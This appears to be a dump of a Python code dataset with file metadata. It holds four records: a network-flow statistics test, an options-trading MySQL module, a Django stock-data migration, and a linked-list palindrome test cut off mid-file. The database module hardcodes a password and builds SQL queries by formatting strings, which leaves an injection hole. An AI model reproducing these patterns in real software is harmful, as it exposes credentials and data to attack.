Dataset schema (one row per source file):

| Column | Type | Length / Range | Nullable |
|---|---|---|---|
| hexsha | string | length 40 | no |
| size | int64 | 5 – 2.06M | no |
| ext | string | 10 classes | no |
| lang | string | 1 value | no |
| max_stars_repo_path | string | length 3 – 248 | no |
| max_stars_repo_name | string | length 5 – 125 | no |
| max_stars_repo_head_hexsha | string | length 40 – 78 | no |
| max_stars_repo_licenses | list | length 1 – 10 | no |
| max_stars_count | int64 | 1 – 191k | yes (⌀) |
| max_stars_repo_stars_event_min_datetime | string | length 24 | yes (⌀) |
| max_stars_repo_stars_event_max_datetime | string | length 24 | yes (⌀) |
| max_issues_repo_path | string | length 3 – 248 | no |
| max_issues_repo_name | string | length 5 – 125 | no |
| max_issues_repo_head_hexsha | string | length 40 – 78 | no |
| max_issues_repo_licenses | list | length 1 – 10 | no |
| max_issues_count | int64 | 1 – 67k | yes (⌀) |
| max_issues_repo_issues_event_min_datetime | string | length 24 | yes (⌀) |
| max_issues_repo_issues_event_max_datetime | string | length 24 | yes (⌀) |
| max_forks_repo_path | string | length 3 – 248 | no |
| max_forks_repo_name | string | length 5 – 125 | no |
| max_forks_repo_head_hexsha | string | length 40 – 78 | no |
| max_forks_repo_licenses | list | length 1 – 10 | no |
| max_forks_count | int64 | 1 – 105k | yes (⌀) |
| max_forks_repo_forks_event_min_datetime | string | length 24 | yes (⌀) |
| max_forks_repo_forks_event_max_datetime | string | length 24 | yes (⌀) |
| content | string | length 5 – 2.06M | no |
| avg_line_length | float64 | 1 – 1.02M | no |
| max_line_length | int64 | 3 – 1.03M | no |
| alphanum_fraction | float64 | 0 – 1 | no |
| count_classes | int64 | 0 – 1.6M | no |
| score_classes | float64 | 0 – 1 | no |
| count_generators | int64 | 0 – 651k | no |
| score_generators | float64 | 0 – 1 | no |
| count_decorators | int64 | 0 – 990k | no |
| score_decorators | float64 | 0 – 1 | no |
| count_async_functions | int64 | 0 – 235k | no |
| score_async_functions | float64 | 0 – 1 | no |
| count_documentation | int64 | 0 – 1.04M | no |
| score_documentation | float64 | 0 – 1 | no |
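For reference, each row of this table can be treated as a plain dict. A minimal sketch of pulling one record apart, assuming the table is published as a Hugging Face dataset (the dataset path below is hypothetical; substitute the actual repo id):

```python
from datasets import load_dataset

# hypothetical dataset path standing in for this table
ds = load_dataset("some-org/python-code-metadata", split="train")

row = ds[0]
print(row["max_stars_repo_name"], row["size"], row["ext"])  # e.g. kjerabek/netexp 2026 py
print(row["content"][:80])                                  # first characters of the source file
print(row["score_documentation"])                           # documentation score in [0, 1]
```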
Record 1:

| Field | Value |
|---|---|
| hexsha | 424d80dc7999edc27c21ab202ecf629475f40e26 |
| size | 2,026 bytes |
| ext / lang | py / Python |
| path | tests/primitives/flow/probe_tcpip_extended_unibiflow_test.py |
| repo (stars / issues / forks views) | kjerabek/netexp |
| head hexsha | 362c200230ba7b2549adcedd4a9890492dad51c7 |
| licenses | MIT |
| stars / issues / forks counts | null / null / null |
```python
from tests.primitives.flow import probe_tcpip_extended_biflow_test

from netexp.primitives.flow import TCPIPFlowExtendedUniBiFlowInfo
from netexp.common import naming


class TestTCPIPExtendedUniBiFlow(probe_tcpip_extended_biflow_test.TestTCPIPExtendedBiFlow):

    flow_class = TCPIPFlowExtendedUniBiFlowInfo

    def test_short_single_uni_flow_stats(self, probe_short_flow):
        probe_short_flow.run()

        processed_flow = self.output.send.call_args.args[0]
        stats = processed_flow.to_dict()

        assert stats[naming.TIMESTAMP_AB] == [1590076139670363, 1590076139673838, 1590076139676297, 1590076139696210,
                                              1590076139696270, 1590076141095061, 1590076141098597]
        assert stats[naming.L3_HEADER_LENGTH_AB] == [20, 20, 20, 20, 20, 20, 20]
        assert stats[naming.L4_HEADER_LENGTH_AB] == [40, 32, 32, 32, 32, 32, 32]
        assert stats[naming.L4_PAYSIZE_AB] == [0, 0, 517, 0, 0, 0, 0]
        assert stats[naming.TCP_FLAG_PSH_AB] == [0, 0, 1, 0, 0, 0, 0]
        assert stats[naming.TCP_FLAG_RST_AB] == [0, 0, 0, 0, 0, 0, 0]
        assert stats[naming.TCP_FLAG_ACK_AB] == [0, 1, 1, 1, 1, 1, 1]
        assert stats[naming.TCP_FLAG_FIN_AB] == [0, 0, 0, 0, 0, 1, 0]
        assert stats[naming.TCP_FLAG_SYN_AB] == [1, 0, 0, 0, 0, 0, 0]

        assert stats[naming.TIMESTAMP_BA] == [1590076139673781, 1590076139679702, 1590076139696191, 1590076139696249,
                                              1590076141098561]
        assert stats[naming.L3_HEADER_LENGTH_BA] == [20, 20, 20, 20, 20]
        assert stats[naming.L4_HEADER_LENGTH_BA] == [40, 32, 32, 32, 32]
        assert stats[naming.L4_PAYSIZE_BA] == [0, 0, 1418, 1740, 0]
        assert stats[naming.TCP_FLAG_PSH_BA] == [0, 0, 0, 1, 0]
        assert stats[naming.TCP_FLAG_RST_BA] == [0, 0, 0, 0, 0]
        assert stats[naming.TCP_FLAG_ACK_BA] == [1, 1, 1, 1, 1]
        assert stats[naming.TCP_FLAG_FIN_BA] == [0, 0, 0, 0, 1]
        assert stats[naming.TCP_FLAG_SYN_BA] == [1, 0, 0, 0, 0]
```
Row stats: avg_line_length 56.277778, max_line_length 117, alphanum_fraction 0.651037, count_classes 1,856 (score_classes 0.916091); all remaining counts and scores are 0.
Record 2:

| Field | Value |
|---|---|
| hexsha | 424f02955cdf26ece00480c3e560a36d37aea6f6 |
| size | 19,816 bytes |
| ext / lang | py / Python |
| path | optionstrader/database.py |
| head hexsha | ed2dbef802ad08f14a0e5280e91746f1bf1fa3f3 |
| licenses | MIT |
| max_stars view | Zaitsev11/Optionstrader; 6 stars (2018-04-26T03:02:04.000Z to 2022-02-26T04:58:53.000Z) |
| max_issues view | webclinic017/Optionstrader; count null |
| max_forks view | webclinic017/Optionstrader; 5 forks (2019-12-01T08:09:08.000Z to 2021-11-28T03:43:24.000Z) |
```python
import time

import mysql.connector

from optionstrader.customlogging import CustomLog
from optionstrader.parser import Parser

MYSQL_IP_ADDR = '192.168.1.10'

# Used to debug via logs
DEBUG = False


class Database:

    def __init__(self):
        """
        There's some confusion with database vs table.
        We will have separate environments for Dev/Stage and Prd,
        so we will want to ensure that the databases are separate.

        TODO: Ensure that the Dev/Stage and Prod environments are fully segregated
        with their own databases. This will allow us to migrate the databases when
        the time comes.

        environment = 'dev' ('dev', 'stage', 'production')
        database = "algotrader_{}".format(environment)
        table = ('accounts', 'optionchainanalysis', 'optionchains', 'stocks')
        """
        # initiate the connection when the database object is created.
        # Standard procedure will be to open the connection,
        # perform the action, then close the connection.
        self.log = CustomLog()
        self.parser = Parser()
        self.connection = self.connect_to_database()

        # CONFIGURATION
        # Possible Values: "Dev", "Stage", "Production"
        # Change the code below when a config file exists
        self.environment = "Dev"
        self.database_name = "algotrader_dev"

        # Below is used to determine how far back in seconds the analyzer tool should go.
        # The reason behind this is that we do not want to delete stock market data.
        # Instead, we would rather query the database and only select the records that
        # are within the threshold.

    def connect_to_database(self):
        # try:
        # Using loopback for testing purposes. Might use socket level later.
        return mysql.connector.connect(user='optionstrader_service_account', password='helloworld',
                                       host=MYSQL_IP_ADDR,
                                       port='3306')
        #database='algotrader_data'
        #mysql.connector.errors.InterfaceError: 2003: Can't connect to MySQL server on 'localwhost:3306'
        # except Exception as e:
        #     msg = "Error! Please check the MySQL database connection: {error}".format(error=e)
        #     self.log.debug(msg)

    def configure_database(self):
        database_name = "algotrader_dev"
        self.create_database(database_name)

        table_columns = "(account_number TEXT, account_type TEXT, balance FLOAT, total_deposits FLOAT, total_withdrawls FLOAT)"
        table_name = "accounts"
        self.create_table(database_name, table_name, table_columns)

        table_columns = "(symbol TEXT, company_name TEXT)"
        table_name = "stocks"
        self.create_table(database_name, table_name, table_columns)

        table_columns = "(symbol TEXT)"
        table_name = "optionchains"
        self.create_table(database_name, table_name, table_columns)

        table_columns = "(symbol TEXT)"
        table_name = "optionchainanalysis"
        self.create_table(database_name, table_name, table_columns)

        # self.parse_symbols_and_add_to_db()
        self.log.debug("Database has been configured")
        return True

    def create_database(self, database_name):
        try:
            cursor = self.connection.cursor()
            query = ("CREATE DATABASE {database_name}").format(database_name=database_name)
            cursor.execute(query)
            output = self.connection.commit()
            cursor.close()
            msg = "Database `{database_name}` created.".format(
                database_name=database_name)
            self.log.debug(msg)
            return True
        except:
            msg = "Database `{database_name}` can't be created.".format(
                database_name=database_name)
            self.log.debug(msg)

    def create_table(self, database_name, table_name, table_columns):
        try:
            cursor = self.connection.cursor()
            query = "CREATE TABLE {database_name}.{table_name} {table_columns}".format(
                database_name=database_name,
                table_name=table_name,
                table_columns=table_columns)
            cursor.execute(query)
            output = self.connection.commit()
            cursor.close()
            msg = "Table `{table_name}` created in database `{database_name}`.".format(
                database_name=database_name,
                table_name=table_name)
            self.log.debug(msg)
            return True
        except:
            msg = "Table `{table_name}` can't be created.".format(
                table_name=table_name)
            self.log.debug(msg)

    def close_connection(self):
        self.connection.close()

    # ====================================
    # ====================================
    # === Code used for Account Class ====
    # ====================================
    # ====================================

    def update_account(self, balance, account_type):
        cursor = self.connection.cursor()
        query = ("UPDATE {db}.accounts SET balance={balance} WHERE account_type=\'{account_type}\'".format(
            db=self.database_name,
            balance=balance,
            account_type=account_type))
        cursor.execute(query)
        self.connection.commit()
        cursor.close()

    def get_recommended_option_purchase(self):
        # TODO
        results_table_cursor = self.connection.cursor()
        #query = ("SELECT balance FROM accounts{env} where account_type='checking'".format(env=self.environment))
        _query = ("SELECT * FROM optionchainanalysisDev ",
                  "WHERE `total_price_paid_1x` BETWEEN 0 and 100 AND ",
                  "`potential_profit_1x` BETWEEN 50 and 100 AND ",
                  "`stock_price_increase` < 3.5 AND ",
                  "`magic_number` BETWEEN 3 and 10 AND ",
                  "`expiration_date` LIKE '2017-03-03' AND ",
                  "`risk_percentage_1x` BETWEEN 0 and 18 ",
                  "ORDER BY `timestamp` DESC")
        query = "".join(_query)
        log_msg = query
        self.connection.commit()
        result = results_table_cursor.execute(query)
        results_table = []
        for record in results_table_cursor:
            results_table.append(record)
        return results_table
        #for record in results_table:
        #    return record

    def get_list_of_tickers(self, query_type='default'):
        # TODO Implement the following:
        # We will want to stream data from external to the database, then stream the
        # symbols from the database as they're made available.
        table = 'optionchains'
        if query_type == 'default':
            # Run the normal code here
            query = "SELECT DISTINCT symbol FROM {db}.stocks WHERE symbol is not Null".format(
                db=self.database_name)
        elif query_type == 'options_only':
            # Run the code to only retrieve symbols which have had stock options in the past
            query = "SELECT DISTINCT underlying FROM {db}.{table} WHERE underlying is not Null".format(
                db=self.database_name,
                table=table)
        elif query_type == 'one_option_only':
            # Arbitrary first option only.
            # Usually used for testing purposes
            query = "SELECT DISTINCT underlying FROM {db}.{table} WHERE underlying is not Null LIMIT 1".format(
                db=self.database_name,
                table=table)
        else:
            # Run a special SQL query here, which returns the symbols in a specific order
            pass

        cursor = self.connection.cursor()
        # As of 2/11/17, there are 3078 total results from this query
        self.connection.commit()
        result = cursor.execute(query)
        print(result)
        list_of_tickers = list()
        for ticker in cursor:
            #print(ticker[0])
            list_of_tickers.append(ticker[0])
        # Return type is a python list [u'AAPL', ..., u'GOOG']
        return list_of_tickers

    def get_current_stock_price(self, symbol):
        # We want to make sure that the 'last_' price is within reason. We don't want to
        # pay 100x the average price of the item.
        cursor = self.connection.cursor(dictionary=True)
        query = "SELECT * FROM {db}.stocks WHERE symbol LIKE \'{symbol}\' ORDER BY `timestamp` DESC LIMIT 1".format(
            db=self.database_name,
            symbol=symbol)
        self.connection.commit()
        result = cursor.execute(query)
        for stock_data in cursor:
            return stock_data['last_']

    def get_example_option_chains(self, num_chains_limit=1):
        # This function has a much less accurate query than query_option_chains_for_analysis.
        # It is typically used for testing purposes.
        cursor = self.connection.cursor(dictionary=True, buffered=True)
        query = ("SELECT * from {db}.optionchains LIMIT {num_chains_limit}".format(
            db=self.database_name,
            num_chains_limit=num_chains_limit))
        self.connection.commit()
        cursor.execute(query)
        self.log.debug("****Type:{0}".format(type(cursor)))
        return cursor

        # NOTE: everything below this return is unreachable (dead code kept from an earlier revision)
        # Only iterate once
        #for option_chain in cursor:
        #    return option_chain, cursor[option_chain]
        # list_of_option_chains is all of the option chains for the ticker;
        # therefore, we need to select and return the most recent one.
        cursor = self.connection.cursor()
        # As of 2/11/17, there are 3078 total results from this query
        query = "SELECT * from {db}.optionchains LIMIT 1".format(
            db=self.database_name)
        self.connection.commit()
        option_chain = cursor.execute(query)
        return option_chain

    def query_option_chains_for_analysis(self,
                                         ticker=None, current_timestamp=int(time.time()), time_threshold=30000,
                                         max_num_option_chains=40):
        # NOTE: the current_timestamp default is evaluated once, at import time.
        # This function has a more precise query than get_example_option_chains.
        # If no ticker is specified, retrieve the most recent option_chains.
        if ticker is None:
            cursor = self.connection.cursor(dictionary=True, buffered=True)
            query_1 = "SELECT * FROM {db}.optionchains WHERE type LIKE 'option' and ".format(
                db=self.database_name)
            query_2 = "timestamp > ({current_timestamp}-{time_threshold}) and ".format(
                time_threshold=time_threshold,
                current_timestamp=current_timestamp)
            query_3 = "option_type LIKE 'call' ORDER BY `timestamp` DESC LIMIT {max_num_option_chains}".format(max_num_option_chains=max_num_option_chains)
            query = (query_1 + query_2 + query_3)
            self.log.debug(query)
            result = cursor.execute(query)
            self.log.debug(cursor.fetchone())
            self.connection.commit()
        # If a ticker is specified, retrieve the most recent option_chains for it.
        else:
            # We want to return the dictionary type,
            # so we need a MySQL buffered response.
            cursor = self.connection.cursor(dictionary=True, buffered=True)
            query_1 = "SELECT * FROM {db}.optionchains WHERE type LIKE 'option' and ".format(
                db=self.database_name)
            query_2 = "timestamp > ({current_timestamp}-{time_threshold}) and underlying LIKE '{ticker}' and ".format(
                ticker=ticker,
                time_threshold=time_threshold,
                current_timestamp=current_timestamp)
            query_3 = "option_type LIKE 'call' ORDER BY `timestamp` DESC LIMIT {max_num_option_chains}".format(max_num_option_chains=max_num_option_chains)
            query = (query_1 + query_2 + query_3)
            result = cursor.execute(query)
            self.connection.commit()
        """
        # cursor is a MySQLCursorDict object.
        # cursor is a MySQLCursorDict: SELECT * FROM optionchainsDev WHERE type..
        # retrieve results using cursor.fetchall()
        """
        return cursor

        # DEPRECATED
        #result = cursor.execute(query)
        # Iterate over all options in the option chains in the database for that ticker.
        # Sorted by time in descending order
        #all_options = []
        #for option_chain in cursor:
        #    all_options.append(option_chain)
        #return all_options

    def sanitize_field_names(self, field_name):
        sanitized_field_names_pairs = {
            'change': 'change_',
            'close': 'close_',
            'open': 'open_',
            'last': 'last_'
        }
        field_name = str(field_name)
        for name in sanitized_field_names_pairs.keys():
            if field_name == name:
                sanitized_field_name = sanitized_field_names_pairs[name]
                return sanitized_field_name
        return field_name

    def save_option_chain_to_table(self, option_chain, table='optionchains'):
        # PLEASE NOTE:
        # If a new keyword (column) is detected, then the INSERT INTO command will fail.
        # The next time that the option chain is saved, the record will update.
        attempt_number = 0
        while True:
            try:
                # add timestamp here
                option_chain['timestamp'] = int(time.time())
                cursor = self.connection.cursor()
                #"{} {}".format(str(a.keys()).replace("'", ""), str(a.values()).replace("'", ""))
                #option_chain.keys(), option_chain.values()
                KEYS = [self.sanitize_field_names(i) for i in option_chain.keys()]
                VALUES = [str(i) for i in option_chain.values()]
                # Should never contain a single apostrophe character.
                # Error out if it contains one.
                keys_error = [str(i).find("'") for i in option_chain.keys()]
                values_error = [str(i).find("'") for i in option_chain.values()]
                if max(max(keys_error), max(values_error)) != -1:
                    log_msg = ""
                    log_msg = "Error: single apostrophe character located in option_chain!"
                keys_formatted = str("(" + str(KEYS)[1:-1] + ")").replace("'", "")
                values_formatted = str("(" + str(VALUES)[1:-1] + ")")
                query = ("INSERT INTO {db}.{table} {keys} VALUES {values}").format(
                    db=self.database_name,
                    table=table,
                    keys=keys_formatted,
                    values=values_formatted)
                log_msg = "~~~~-----------------~~~"
                query = query.replace("'None'", 'NULL')
                if DEBUG is True:
                    print(query)
                cursor.execute(query)
                self.connection.commit()
                cursor.close()
                # Break the while loop
                break
            except mysql.connector.ProgrammingError:
                # This means that the fields don't exist in the database;
                # time to add the fields to the database.
                log_msg = "Warning. Trying to update the database with fields which don't yet exist in the table."
                # Unsure which key is the problem one.
                # Try to create a field with each key.
                # If the key is already a field in the database, then pass without error.
                for field_name in KEYS:
                    # the MySQL database needs specific table names to be off limits
                    try:
                        field_type = self.type_conversion(option_chain[field_name])
                    except:
                        field_type = self.type_conversion(option_chain[field_name[:-1]])
                    try:
                        self.add_new_column_to_table(field_name, field_type, table=table)
                    except mysql.connector.ProgrammingError:
                        pass
                log_msg = "Information. The fields were updated in table '{0}'.".format(table)
                if attempt_number == 1:
                    log_msg = "Error: Unable to update SQL table"
                    break
                else:
                    log_msg = "Retrying the update to the table"
                    attempt_number += 1
        return True

    def update_option_chain_with_analysis(self, percentage_increase_analysis):
        # This is the analysis done for the percentage increase (1, 2, 5 percent)
        # of an underlyer
        result = self.save_option_chain_to_table(percentage_increase_analysis, table='optionchainanalysis')
        return True

    def add_new_column_to_table(self, column_name, data_type, table):
        cursor = self.connection.cursor()
        env = self.environment
        query = "ALTER TABLE {db}.{table} ADD {column_name} {data_type}".format(
            db=self.database_name,
            table=table,
            column_name=column_name,
            data_type=data_type)
        cursor.execute(query)
        self.connection.commit()
        return True

    def add_money_to_account(self, amount_of_money, account_type):
        current_balance = self.get_checking_account_balance()
        output = str(current_balance + amount_of_money)
        self.update_checking_account(output)
        print(self.get_checking_account_balance())

    def subtract_money_from_account(self, amount_of_money, account_type):
        current_balance = self.get_checking_account_balance()
        output = str(current_balance - amount_of_money)
        self.update_checking_account(output)
        print(self.get_checking_account_balance())

    def add_field_to_table(self, field, _type):
        cursor = self.connection.cursor()
        #query = ("ALTER TABLE stocks ADD %s %s") % (field, type)
        query = "ALTER TABLE {db}.stocks ADD {field} {type}".format(
            db=self.database_name,
            field=field,
            type=_type)
        cursor.execute(query)
        self.connection.commit()
        cursor.close()

    def insert_values_into_table(self, column_string, value_string):
        cursor = self.connection.cursor()
        query = "INSERT INTO {db}.stocks {column_string} VALUES {value_string}".format(
            db=self.database_name,
            column_string=column_string,
            value_string=value_string)
        self.log.debug(query)
        cursor.execute(query)
        self.connection.commit()
        cursor.close()

    def type_conversion(self, object_item):
        # We need to convert the types so that the sql database knows what to do.
        # The names of the types differ between python and mysql.
        # Examples: unicode, NoneType, int, float
        obj_type = type(object_item)
        #self.log.debug(object_item)
        #self.log.debug(obj_type)
        obj_type_str = str(obj_type).split("'")[1]
        if obj_type_str == 'unicode':
            return "text"
        if obj_type_str == 'float':
            return "float"
        if obj_type_str == 'NoneType':
            return "text"
        if obj_type_str == 'int':
            return "bigint(20)"
        else:
            return "text"

    def parse_symbols_and_add_to_db(self):
        # technically this should go in a separate test_parser module... TODO.
        results = self.parser.extract_symbols()
        for symbol_and_name in results[1:]:
            column_string = "(symbol, company_name)"
            value_string = "(\"{symbol}\", \"{company_name}\")".format(
                symbol=symbol_and_name[0], company_name=symbol_and_name[1])
            self.insert_values_into_table(column_string, value_string)
        msg = "Symbols parsed and added to database"
        self.log.debug(msg)
        return results
```
Row stats: avg_line_length 41.717895, max_line_length 155, alphanum_fraction 0.605874, count_classes 19,618 (score_classes 0.990008), count_documentation 7,637 (score_documentation 0.385396); all remaining counts and scores are 0.
Record 3:

| Field | Value |
|---|---|
| hexsha | 424fc9a502a8c9fe3c5da2a1e3dec902d92abba5 |
| size | 10,254 bytes |
| ext / lang | py / Python |
| path | backend/api/migrations/0001_initial.py |
| repo (all views) | leowotzak/ljwe-db |
| head hexsha | ab49f90feaac5fad26efa900db5567c9c09f3435 |
| licenses | MIT |
| max_stars | count null |
| max_issues | 9 issues (2021-11-17T18:31:29.000Z to 2021-11-21T00:47:39.000Z) |
| max_forks | count null |
```python
# Generated by Django 3.2.9 on 2021-11-24 02:52

from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Symbol',
            fields=[
                ('symbol_id', models.AutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(max_length=200)),
                ('ticker', models.CharField(max_length=30)),
                ('description', models.TextField(blank=True, null=True)),
                ('sector', models.CharField(blank=True, max_length=30, null=True)),
                ('asset_type', models.CharField(blank=True, max_length=30, null=True)),
                ('created_date', models.DateTimeField(blank=True, null=True)),
                ('last_updated_date', models.DateTimeField(blank=True, null=True)),
            ],
            options={
                'db_table': 'symbol',
                'managed': True,
            },
        ),
        migrations.CreateModel(
            name='BarDataWeekly',
            fields=[
                ('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
                ('open_price', models.FloatField()),
                ('high_price', models.FloatField()),
                ('low_price', models.FloatField()),
                ('close_price', models.FloatField()),
                ('adj_close_price', models.FloatField(blank=True, null=True)),
                ('volume', models.IntegerField()),
                ('dividend_amount', models.FloatField(blank=True, null=True)),
                ('split_coeff', models.FloatField(blank=True, null=True)),
                ('created_date', models.DateTimeField(blank=True, null=True)),
                ('last_updated_date', models.DateTimeField(blank=True, null=True)),
                ('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
            ],
            options={
                'db_table': 'bar_data_weekly',
                'managed': True,
                'unique_together': {('timestamp', 'symbol')},
            },
        ),
        migrations.CreateModel(
            name='BarDataMonthly',
            fields=[
                ('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
                ('open_price', models.FloatField()),
                ('high_price', models.FloatField()),
                ('low_price', models.FloatField()),
                ('close_price', models.FloatField()),
                ('adj_close_price', models.FloatField(blank=True, null=True)),
                ('volume', models.IntegerField()),
                ('dividend_amount', models.FloatField(blank=True, null=True)),
                ('split_coeff', models.FloatField(blank=True, null=True)),
                ('created_date', models.DateTimeField(blank=True, null=True)),
                ('last_updated_date', models.DateTimeField(blank=True, null=True)),
                ('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
            ],
            options={
                'db_table': 'bar_data_monthly',
                'managed': True,
                'unique_together': {('timestamp', 'symbol')},
            },
        ),
        migrations.CreateModel(
            name='BarDataDaily',
            fields=[
                ('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
                ('open_price', models.FloatField()),
                ('high_price', models.FloatField()),
                ('low_price', models.FloatField()),
                ('close_price', models.FloatField()),
                ('adj_close_price', models.FloatField(blank=True, null=True)),
                ('volume', models.IntegerField()),
                ('dividend_amount', models.FloatField(blank=True, null=True)),
                ('split_coeff', models.FloatField(blank=True, null=True)),
                ('created_date', models.DateTimeField(blank=True, null=True)),
                ('last_updated_date', models.DateTimeField(blank=True, null=True)),
                ('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
            ],
            options={
                'db_table': 'bar_data_daily',
                'managed': True,
                'unique_together': {('timestamp', 'symbol')},
            },
        ),
        migrations.CreateModel(
            name='BarData5Min',
            fields=[
                ('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
                ('open_price', models.FloatField()),
                ('high_price', models.FloatField()),
                ('low_price', models.FloatField()),
                ('close_price', models.FloatField()),
                ('adj_close_price', models.FloatField(blank=True, null=True)),
                ('volume', models.IntegerField()),
                ('dividend_amount', models.FloatField(blank=True, null=True)),
                ('split_coeff', models.FloatField(blank=True, null=True)),
                ('created_date', models.DateTimeField(blank=True, null=True)),
                ('last_updated_date', models.DateTimeField(blank=True, null=True)),
                ('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
            ],
            options={
                'db_table': 'bar_data_5min',
                'managed': True,
                'unique_together': {('timestamp', 'symbol')},
            },
        ),
        migrations.CreateModel(
            name='BarData30Min',
            fields=[
                ('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
                ('open_price', models.FloatField()),
                ('high_price', models.FloatField()),
                ('low_price', models.FloatField()),
                ('close_price', models.FloatField()),
                ('adj_close_price', models.FloatField(blank=True, null=True)),
                ('volume', models.IntegerField()),
                ('dividend_amount', models.FloatField(blank=True, null=True)),
                ('split_coeff', models.FloatField(blank=True, null=True)),
                ('created_date', models.DateTimeField(blank=True, null=True)),
                ('last_updated_date', models.DateTimeField(blank=True, null=True)),
                ('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
            ],
            options={
                'db_table': 'bar_data_30min',
                'managed': True,
                'unique_together': {('timestamp', 'symbol')},
            },
        ),
        migrations.CreateModel(
            name='BarData1Min',
            fields=[
                ('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
                ('open_price', models.FloatField()),
                ('high_price', models.FloatField()),
                ('low_price', models.FloatField()),
                ('close_price', models.FloatField()),
                ('adj_close_price', models.FloatField(blank=True, null=True)),
                ('volume', models.IntegerField()),
                ('dividend_amount', models.FloatField(blank=True, null=True)),
                ('split_coeff', models.FloatField(blank=True, null=True)),
                ('created_date', models.DateTimeField(blank=True, null=True)),
                ('last_updated_date', models.DateTimeField(blank=True, null=True)),
                ('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
            ],
            options={
                'db_table': 'bar_data_1min',
                'managed': True,
                'unique_together': {('timestamp', 'symbol')},
            },
        ),
        migrations.CreateModel(
            name='BarData1H',
            fields=[
                ('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
                ('open_price', models.FloatField()),
                ('high_price', models.FloatField()),
                ('low_price', models.FloatField()),
                ('close_price', models.FloatField()),
                ('adj_close_price', models.FloatField(blank=True, null=True)),
                ('volume', models.IntegerField()),
                ('dividend_amount', models.FloatField(blank=True, null=True)),
                ('split_coeff', models.FloatField(blank=True, null=True)),
                ('created_date', models.DateTimeField(blank=True, null=True)),
                ('last_updated_date', models.DateTimeField(blank=True, null=True)),
                ('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
            ],
            options={
                'db_table': 'bar_data_1h',
                'managed': True,
                'unique_together': {('timestamp', 'symbol')},
            },
        ),
        migrations.CreateModel(
            name='BarData15Min',
            fields=[
                ('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
                ('open_price', models.FloatField()),
                ('high_price', models.FloatField()),
                ('low_price', models.FloatField()),
                ('close_price', models.FloatField()),
                ('adj_close_price', models.FloatField(blank=True, null=True)),
                ('volume', models.IntegerField()),
                ('dividend_amount', models.FloatField(blank=True, null=True)),
                ('split_coeff', models.FloatField(blank=True, null=True)),
                ('created_date', models.DateTimeField(blank=True, null=True)),
                ('last_updated_date', models.DateTimeField(blank=True, null=True)),
                ('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
            ],
            options={
                'db_table': 'bar_data_15min',
                'managed': True,
                'unique_together': {('timestamp', 'symbol')},
            },
        ),
    ]
```
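The eight bar-data models above differ only in class name and db_table. Django generated this file automatically, but if it were maintained by hand, the repetition could be produced with a small helper reusing the imports above (a sketch only; `bar_data_model` is a hypothetical name, not part of the migration):

```python
def bar_data_model(name, db_table):
    """Builds one CreateModel operation; all bar-data tables share the same fields."""
    return migrations.CreateModel(
        name=name,
        fields=[
            ('timestamp', models.DateTimeField(primary_key=True, serialize=False)),
            ('open_price', models.FloatField()),
            ('high_price', models.FloatField()),
            ('low_price', models.FloatField()),
            ('close_price', models.FloatField()),
            ('adj_close_price', models.FloatField(blank=True, null=True)),
            ('volume', models.IntegerField()),
            ('dividend_amount', models.FloatField(blank=True, null=True)),
            ('split_coeff', models.FloatField(blank=True, null=True)),
            ('created_date', models.DateTimeField(blank=True, null=True)),
            ('last_updated_date', models.DateTimeField(blank=True, null=True)),
            ('symbol', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='api.symbol')),
        ],
        options={'db_table': db_table, 'managed': True,
                 'unique_together': {('timestamp', 'symbol')}},
    )

# e.g. operations = [..., bar_data_model('BarDataDaily', 'bar_data_daily'), ...]
```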
Row stats: avg_line_length 49.062201, max_line_length 111, alphanum_fraction 0.536083, count_classes 10,128 (score_classes 0.987712), count_documentation 2,185 (score_documentation 0.213088); all remaining counts and scores are 0.
Record 4:

| Field | Value |
|---|---|
| hexsha | 42500bb71a15c0815810b37eafb946db4fb96b64 |
| size | 3,713 bytes |
| ext / lang | py / Python |
| path | Ch2_Linked_Lists/test/test_CTCI_Ch2_Ex6.py |
| repo (all views) | mtrdazzo/CTCI |
| head hexsha | 30a82aed96b05fe21b7d337a138e4ec19950eb9d |
| licenses | MIT |
| stars / issues / forks counts | null / null / null |
```python
from unittest import TestCase

from CTCI.Ch2_Linked_Lists.common.SinglyLinkedList import Empty, Node
from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import PalindromeSinglyLinkedList, is_palindrome_brute_force
from CTCI.Ch2_Linked_Lists.exercises.CTCI_Ch2_Ex6 import is_palindrome_reverse


class TestPalindromeSinglyLinkedList(TestCase):

    def setUp(self):
        self.pll = PalindromeSinglyLinkedList()

    def tearDown(self):
        self.pll = None

    def test_empty_list(self):
        with self.assertRaises(Empty):
            self.pll.is_palindrome()

    def test_single_element(self):
        self.pll.add(1)
        self.assertTrue(self.pll.is_palindrome())

    def test_two_elements(self):
        self.pll.add(1)
        self.pll.add(1)
        self.assertTrue(self.pll.is_palindrome())
        self.pll.remove(1)
        self.pll.add(2)
        self.assertFalse(self.pll.is_palindrome())

    def test_more_than_two_elements_even(self):
        self.pll.add(1)
        self.pll.add(2)
        self.pll.add(2)
        self.pll.add(2)
        self.assertFalse(self.pll.is_palindrome())
        self.pll.remove(2)
        self.pll.add(1)
        self.assertTrue(self.pll.is_palindrome())

    def test_more_than_two_elements_odd(self):
        self.pll.add(1)
        self.pll.add(2)
        self.pll.add(2)
        self.assertFalse(self.pll.is_palindrome())
